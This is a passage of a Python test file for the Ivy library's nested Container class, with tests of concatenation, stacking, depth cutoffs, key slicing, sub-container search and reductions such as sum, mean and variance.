assert np.allclose(ivy.to_numpy(container_unified.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_unified.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_unified.b.d[0]), np.array([3]))
if len(devs) > 1:
assert np.allclose(ivy.to_numpy(container_unified.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_unified.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_unified.b.d[1]), np.array([6]))
def test_container_concat(dev, call):
container_0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_1 = Container({'a': ivy.array([4], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([6], dev=dev)}})
container_concatenated = ivy.Container.concat([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_concatenated['a']), np.array([1, 4]))
assert np.allclose(ivy.to_numpy(container_concatenated.a), np.array([1, 4]))
assert np.allclose(ivy.to_numpy(container_concatenated['b']['c']), np.array([2, 5]))
assert np.allclose(ivy.to_numpy(container_concatenated.b.c), np.array([2, 5]))
assert np.allclose(ivy.to_numpy(container_concatenated['b']['d']), np.array([3, 6]))
assert np.allclose(ivy.to_numpy(container_concatenated.b.d), np.array([3, 6]))
def test_container_stack(dev, call):
container_0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_1 = Container({'a': ivy.array([4], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([6], dev=dev)}})
container_stacked = ivy.Container.stack([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_stacked['a']), np.array([[1], [4]]))
assert np.allclose(ivy.to_numpy(container_stacked.a), np.array([[1], [4]]))
assert np.allclose(ivy.to_numpy(container_stacked['b']['c']), np.array([[2], [5]]))
assert np.allclose(ivy.to_numpy(container_stacked.b.c), np.array([[2], [5]]))
assert np.allclose(ivy.to_numpy(container_stacked['b']['d']), np.array([[3], [6]]))
assert np.allclose(ivy.to_numpy(container_stacked.b.d), np.array([[3], [6]]))
def test_container_combine(dev, call):
container_0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_1 = Container({'a': ivy.array([4], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'e': ivy.array([6], dev=dev)}})
container_comb = ivy.Container.combine(container_0, container_1)
assert np.equal(ivy.to_numpy(container_comb.a), np.array([4]))
assert np.equal(ivy.to_numpy(container_comb.b.c), np.array([5]))
assert np.equal(ivy.to_numpy(container_comb.b.d), np.array([3]))
assert np.equal(ivy.to_numpy(container_comb.b.e), np.array([6]))
# def test_container_diff(dev, call):
# # all different arrays
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([4], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([6], dev=dev)}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([4]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
# assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.b.d.diff_1), np.array([6]))
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == container_diff.to_dict()
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == {}
#
# # some different arrays
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
# assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert 'a' not in container_diff_diff_only
# assert 'b' in container_diff_diff_only
# assert 'c' in container_diff_diff_only['b']
# assert 'd' not in container_diff_diff_only['b']
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert 'a' in container_diff_same_only
# assert 'b' in container_diff_same_only
# assert 'c' not in container_diff_same_only['b']
# assert 'd' in container_diff_same_only['b']
#
# # all different keys
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'e': ivy.array([1], dev=dev),
# 'f': {'g': ivy.array([2], dev=dev), 'h': ivy.array([3], dev=dev)}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([3]))
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == container_diff.to_dict()
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == {}
#
# # some different keys
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'e': ivy.array([3], dev=dev)}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert 'a' not in container_diff_diff_only
# assert 'b' in container_diff_diff_only
# assert 'c' not in container_diff_diff_only['b']
# assert 'd' in container_diff_diff_only['b']
# assert 'e' in container_diff_diff_only['b']
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert 'a' in container_diff_same_only
# assert 'b' in container_diff_same_only
# assert 'c' in container_diff_same_only['b']
# assert 'd' not in container_diff_same_only['b']
# assert 'e' not in container_diff_same_only['b']
#
# # same containers
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == {}
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == container_diff.to_dict()
#
# # all different strings
# container_0 = Container({'a': '1',
# 'b': {'c': '2', 'd': '3'}})
# container_1 = Container({'a': '4',
# 'b': {'c': '5', 'd': '6'}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert container_diff.a.diff_0 == '1'
# assert container_diff.a.diff_1 == '4'
# assert container_diff.b.c.diff_0 == '2'
# assert container_diff.b.c.diff_1 == '5'
# assert container_diff.b.d.diff_0 == '3'
# assert container_diff.b.d.diff_1 == '6'
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == container_diff.to_dict()
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == {}
# def test_container_structural_diff(dev, call):
# # all different keys or shapes
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([[4]], dev=dev),
# 'b': {'c': ivy.array([[[5]]], dev=dev), 'e': ivy.array([3], dev=dev)}})
# container_diff = ivy.Container.structural_diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([[4]]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([[[5]]]))
# assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
# container_diff_diff_only = ivy.Container.structural_diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == container_diff.to_dict()
# container_diff_same_only = ivy.Container.structural_diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == {}
#
# # some different shapes
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([4], dev=dev),
# 'b': {'c': ivy.array([[5]], dev=dev), 'd': ivy.array([6], dev=dev)}})
# container_diff = ivy.Container.structural_diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
# assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
# container_diff_diff_only = ivy.Container.structural_diff(container_0, container_1, mode='diff_only')
# assert 'a' not in container_diff_diff_only
# assert 'b' in container_diff_diff_only
# assert 'c' in container_diff_diff_only['b']
# assert 'd' not in container_diff_diff_only['b']
# container_diff_same_only = ivy.Container.structural_diff(container_0, container_1, mode='same_only')
# assert 'a' in container_diff_same_only
# assert 'b' in container_diff_same_only
# assert 'c' not in container_diff_same_only['b']
# assert 'd' in container_diff_same_only['b']
#
# # all different keys
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'e': ivy.array([4], dev=dev),
# 'f': {'g': ivy.array([5], dev=dev), 'h': ivy.array([6], dev=dev)}})
# container_diff = ivy.Container.structural_diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([4]))
# assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([5]))
# assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([6]))
# container_diff_diff_only = ivy.Container.structural_diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == container_diff.to_dict()
# container_diff_same_only = ivy.Container.structural_diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == {}
#
# # some different keys
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([4], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'e': ivy.array([6], dev=dev)}})
# container_diff = ivy.Container.structural_diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([6]))
# container_diff_diff_only = ivy.Container.structural_diff(container_0, container_1, mode='diff_only')
# assert 'a' not in container_diff_diff_only
# assert 'b' in container_diff_diff_only
# assert 'c' not in container_diff_diff_only['b']
# assert 'd' in container_diff_diff_only['b']
# assert 'e' in container_diff_diff_only['b']
# container_diff_same_only = ivy.Container.structural_diff(container_0, container_1, mode='same_only')
# assert 'a' in container_diff_same_only
# assert 'b' in container_diff_same_only
# assert 'c' in container_diff_same_only['b']
# assert 'd' not in container_diff_same_only['b']
# assert 'e' not in container_diff_same_only['b']
#
# # all same
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([4], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([6], dev=dev)}})
# container_diff = ivy.Container.structural_diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
# container_diff_diff_only = ivy.Container.structural_diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == {}
# container_diff_same_only = ivy.Container.structural_diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == container_diff.to_dict()
def test_container_from_dict(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_depth(dev, call):
cont_depth1 = Container({'a': ivy.array([1], dev=dev),
'b': ivy.array([2], dev=dev)})
assert cont_depth1.max_depth == 1
cont_depth2 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
assert cont_depth2.max_depth == 2
cont_depth3 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': {'d': ivy.array([2], dev=dev)}, 'e': ivy.array([3], dev=dev)}})
assert cont_depth3.max_depth == 3
cont_depth4 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': {'d': {'e': ivy.array([2], dev=dev)}}}})
assert cont_depth4.max_depth == 4
@pytest.mark.parametrize(
"inplace", [True, False])
def test_container_cutoff_at_depth(inplace, dev, call):
# values
a_val = ivy.array([1], dev=dev)
bcde_val = ivy.array([2], dev=dev)
# depth 1
cont = Container({'a': a_val, 'b': {'c': {'d': {'e': bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(1, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b
# depth 2
cont = Container({'a': a_val, 'b': {'c': {'d': {'e': bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(2, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b.c
# depth 3
cont = Container({'a': a_val, 'b': {'c': {'d': {'e': bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(3, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b.c.d
# depth 4
cont = Container({'a': a_val, 'b': {'c': {'d': {'e': bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(4, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(bcde_val))
@pytest.mark.parametrize(
"inplace", [True, False])
def test_container_cutoff_at_height(inplace, dev, call):
# values
d_val = ivy.array([2], dev=dev)
e_val = ivy.array([3], dev=dev)
# height 0
cont = Container({'a': {'c': {'d': d_val}}, 'b': {'c': {'d': {'e': e_val}}}})
cont_cutoff = cont.cutoff_at_height(0, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a.c.d), ivy.to_numpy(d_val))
assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(e_val))
# height 1
cont = Container({'a': {'c': {'d': d_val}}, 'b': {'c': {'d': {'e': e_val}}}})
cont_cutoff = cont.cutoff_at_height(1, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a.c
assert not cont_cutoff.b.c.d
# height 2
cont = Container({'a': {'c': {'d': d_val}}, 'b': {'c': {'d': {'e': e_val}}}})
cont_cutoff = cont.cutoff_at_height(2, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a
assert not cont_cutoff.b.c
# height 3
cont = Container({'a': {'c': {'d': d_val}}, 'b': {'c': {'d': {'e': e_val}}}})
cont_cutoff = cont.cutoff_at_height(3, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a
assert not cont_cutoff.b
# height 4
cont = Container({'a': {'c': {'d': d_val}}, 'b': {'c': {'d': {'e': e_val}}}})
cont_cutoff = cont.cutoff_at_height(4, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff
@pytest.mark.parametrize(
"str_slice", [True, False])
def test_container_slice_keys(str_slice, dev, call):
# values
a_val = ivy.array([1], dev=dev)
b_val = ivy.array([2], dev=dev)
c_val = ivy.array([3], dev=dev)
d_val = ivy.array([4], dev=dev)
e_val = ivy.array([5], dev=dev)
# slice
if str_slice:
slc = 'b:d'
else:
slc = slice(1, 4, 1)
# without dict
cont = Container({'a': a_val, 'b': b_val, 'c': c_val, 'd': d_val, 'e': e_val})
cont_sliced = cont.slice_keys(slc)
assert 'a' not in cont_sliced
assert np.allclose(ivy.to_numpy(cont_sliced.b), ivy.to_numpy(b_val))
assert np.allclose(ivy.to_numpy(cont_sliced.c), ivy.to_numpy(c_val))
assert np.allclose(ivy.to_numpy(cont_sliced.d), ivy.to_numpy(d_val))
assert 'e' not in cont_sliced
# with dict, depth 0
sub_cont = Container({'a': a_val, 'b': b_val, 'c': c_val, 'd': d_val, 'e': e_val})
cont = Container({'a': sub_cont, 'b': sub_cont, 'c': sub_cont, 'd': sub_cont, 'e': sub_cont})
cont_sliced = cont.slice_keys({0: slc})
assert 'a' not in cont_sliced
assert Container.identical([cont_sliced.b, sub_cont])
assert Container.identical([cont_sliced.c, sub_cont])
assert Container.identical([cont_sliced.d, sub_cont])
assert 'e' not in cont_sliced
# with dict, depth 1
sub_cont = Container({'a': a_val, 'b': b_val, 'c': c_val, 'd': d_val, 'e': e_val})
sub_sub_cont = Container({'b': b_val, 'c': c_val, 'd': d_val})
cont = Container({'a': sub_cont, 'b': sub_cont, 'c': sub_cont, 'd': sub_cont, 'e': sub_cont})
cont_sliced = cont.slice_keys({1: slc})
assert Container.identical([cont_sliced.a, sub_sub_cont])
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert Container.identical([cont_sliced.e, sub_sub_cont])
# with dict, depth 0, 1
sub_cont = Container({'a': a_val, 'b': b_val, 'c': c_val, 'd': d_val, 'e': e_val})
sub_sub_cont = Container({'b': b_val, 'c': c_val, 'd': d_val})
cont = Container({'a': sub_cont, 'b': sub_cont, 'c': sub_cont, 'd': sub_cont, 'e': sub_cont})
cont_sliced = cont.slice_keys({0: slc, 1: slc})
assert 'a' not in cont_sliced
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert 'e' not in cont_sliced
# all depths
sub_cont = Container({'a': a_val, 'b': b_val, 'c': c_val, 'd': d_val, 'e': e_val})
sub_sub_cont = Container({'b': b_val, 'c': c_val, 'd': d_val})
cont = Container({'a': sub_cont, 'b': sub_cont, 'c': sub_cont, 'd': sub_cont, 'e': sub_cont})
cont_sliced = cont.slice_keys(slc, all_depths=True)
assert 'a' not in cont_sliced
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert 'e' not in cont_sliced
def test_container_show(dev, call):
if call is helpers.mx_call:
# ToDo: get this working for mxnet again, recent version update caused errors.
pytest.skip()
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
cont = Container(dict_in)
print(cont)
cont.show()
def test_container_find_sub_container(dev, call):
arr1 = ivy.array([1], dev=dev)
arr2 = ivy.array([2], dev=dev)
arr3 = ivy.array([3], dev=dev)
dict_in = {'a': arr1, 'b': {'c': arr2, 'd': arr3}}
top_cont = Container(dict_in)
# full
sub_cont = Container(dict_in['b'])
assert sub_cont in top_cont
found_kc = top_cont.find_sub_container(sub_cont)
assert found_kc == 'b'
found_kc = top_cont.find_sub_container(top_cont)
assert found_kc == ''
# partial
partial_sub_cont = Container({'d': arr3})
found_kc = top_cont.find_sub_container(partial_sub_cont, partial=True)
assert found_kc == 'b'
assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
partial_sub_cont = Container({'b': {'d': arr3}})
found_kc = top_cont.find_sub_container(partial_sub_cont, partial=True)
assert found_kc == ''
assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
def test_container_find_sub_structure(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
top_cont = Container(dict_in)
# full
sub_cont = Container({'c': ivy.array([4], dev=dev), 'd': ivy.array([5], dev=dev)})
assert not top_cont.find_sub_container(sub_cont)
found_kc = top_cont.find_sub_structure(sub_cont)
assert found_kc == 'b'
found_kc = top_cont.find_sub_structure(top_cont)
assert found_kc == ''
# partial
partial_sub_cont = Container({'d': ivy.array([5], dev=dev)})
found_kc = top_cont.find_sub_structure(partial_sub_cont, partial=True)
assert found_kc == 'b'
partial_sub_cont = Container({'b': {'d': ivy.array([5], dev=dev)}})
found_kc = top_cont.find_sub_structure(partial_sub_cont, partial=True)
assert found_kc == ''
def test_container_show_sub_container(dev, call):
if call is helpers.mx_call:
# ToDo: get this working for mxnet again, recent version update caused errors.
pytest.skip()
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
top_cont = Container(dict_in)
sub_cont = Container(dict_in['b'])
top_cont.show_sub_container('b')
top_cont.show_sub_container(sub_cont)
def test_container_from_dict_w_cont_types(dev, call):
# ToDo: add tests for backends other than jax
if call is not helpers.jnp_call:
pytest.skip()
from haiku._src.data_structures import FlatMapping
dict_in = {'a': ivy.array([1], dev=dev),
'b': FlatMapping({'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)})}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_from_kwargs(dev, call):
container = Container(a=ivy.array([1], dev=dev),
b={'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)})
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_from_list(dev, call):
list_in = [ivy.array([1], dev=dev),
[ivy.array([2], dev=dev), ivy.array([3], dev=dev)]]
container = Container(list_in, types_to_iteratively_nest=[list])
assert np.allclose(ivy.to_numpy(container['it_0']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.it_0), np.array([1]))
assert np.allclose(ivy.to_numpy(container['it_1']['it_0']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.it_1.it_0), np.array([2]))
assert np.allclose(ivy.to_numpy(container['it_1']['it_1']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.it_1.it_1), np.array([3]))
def test_container_from_tuple(dev, call):
tuple_in = (ivy.array([1], dev=dev),
(ivy.array([2], dev=dev), ivy.array([3], dev=dev)))
container = Container(tuple_in, types_to_iteratively_nest=[tuple])
assert np.allclose(ivy.to_numpy(container['it_0']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.it_0), np.array([1]))
assert np.allclose(ivy.to_numpy(container['it_1']['it_0']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.it_1.it_0), np.array([2]))
assert np.allclose(ivy.to_numpy(container['it_1']['it_1']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.it_1.it_1), np.array([3]))
def test_container_to_raw(dev, call):
tuple_in = (ivy.array([1], dev=dev),
(ivy.array([2], dev=dev), ivy.array([3], dev=dev)))
container = Container(tuple_in, types_to_iteratively_nest=[tuple])
raw = container.to_raw()
assert np.allclose(ivy.to_numpy(raw[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(raw[1][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(raw[1][1]), np.array([3]))
def test_container_sum(dev, call):
dict_in = {'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev), 'd': ivy.array([3., 6., 9.], dev=dev)}}
container = Container(dict_in)
container_sum = container.sum()
assert np.allclose(ivy.to_numpy(container_sum['a']), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_sum.a), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_sum['b']['c']), np.array([12.]))
assert np.allclose(ivy.to_numpy(container_sum.b.c), np.array([12.]))
assert np.allclose(ivy.to_numpy(container_sum['b']['d']), np.array([18.]))
assert np.allclose(ivy.to_numpy(container_sum.b.d), np.array([18.]))
def test_container_prod(dev, call):
dict_in = {'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev), 'd': ivy.array([3., 6., 9.], dev=dev)}}
container = Container(dict_in)
container_prod = container.prod()
assert np.allclose(ivy.to_numpy(container_prod['a']), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_prod.a), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_prod['b']['c']), np.array([48.]))
assert np.allclose(ivy.to_numpy(container_prod.b.c), np.array([48.]))
assert np.allclose(ivy.to_numpy(container_prod['b']['d']), np.array([162.]))
assert np.allclose(ivy.to_numpy(container_prod.b.d), np.array([162.]))
def test_container_mean(dev, call):
dict_in = {'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev), 'd': ivy.array([3., 6., 9.], dev=dev)}}
container = Container(dict_in)
container_mean = container.mean()
assert np.allclose(ivy.to_numpy(container_mean['a']), np.array([2.]))
assert np.allclose(ivy.to_numpy(container_mean.a), np.array([2.]))
assert np.allclose(ivy.to_numpy(container_mean['b']['c']), np.array([4.]))
assert np.allclose(ivy.to_numpy(container_mean.b.c), np.array([4.]))
assert np.allclose(ivy.to_numpy(container_mean['b']['d']), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_mean.b.d), np.array([6.]))
def test_container_var(dev, call):
dict_in = {'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev), 'd': ivy.array([3., 6., 9.], dev=dev)}}
container = Container(dict_in)
container_var = container.var()
assert np.allclose(ivy.to_numpy(container_var['a']), np.array([2 / 3]))
assert np.allclose(ivy.to_numpy(container_var.a), np.array([2 / 3]))
assert np.allclose(ivy.to_numpy(container_var['b']['c']), np.array([8 / 3]))
assert np.allclose(ivy.to_numpy(container_var.b.c), np.array([8 / 3]))
assert np.allclose(ivy.to_numpy(container_var['b']['d']), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_var.b.d), np.array([6.]))
def test_container_std(dev, call):
dict_in = {'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev), 'd': ivy.array([3., 6., 9.], dev=dev)}}
container = Container(dict_in)
container_std = container.std()
assert np.allclose(ivy.to_numpy(container_std['a']), np.array([2 / 3]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std.a), np.array([2 / 3]) ** 0.5)
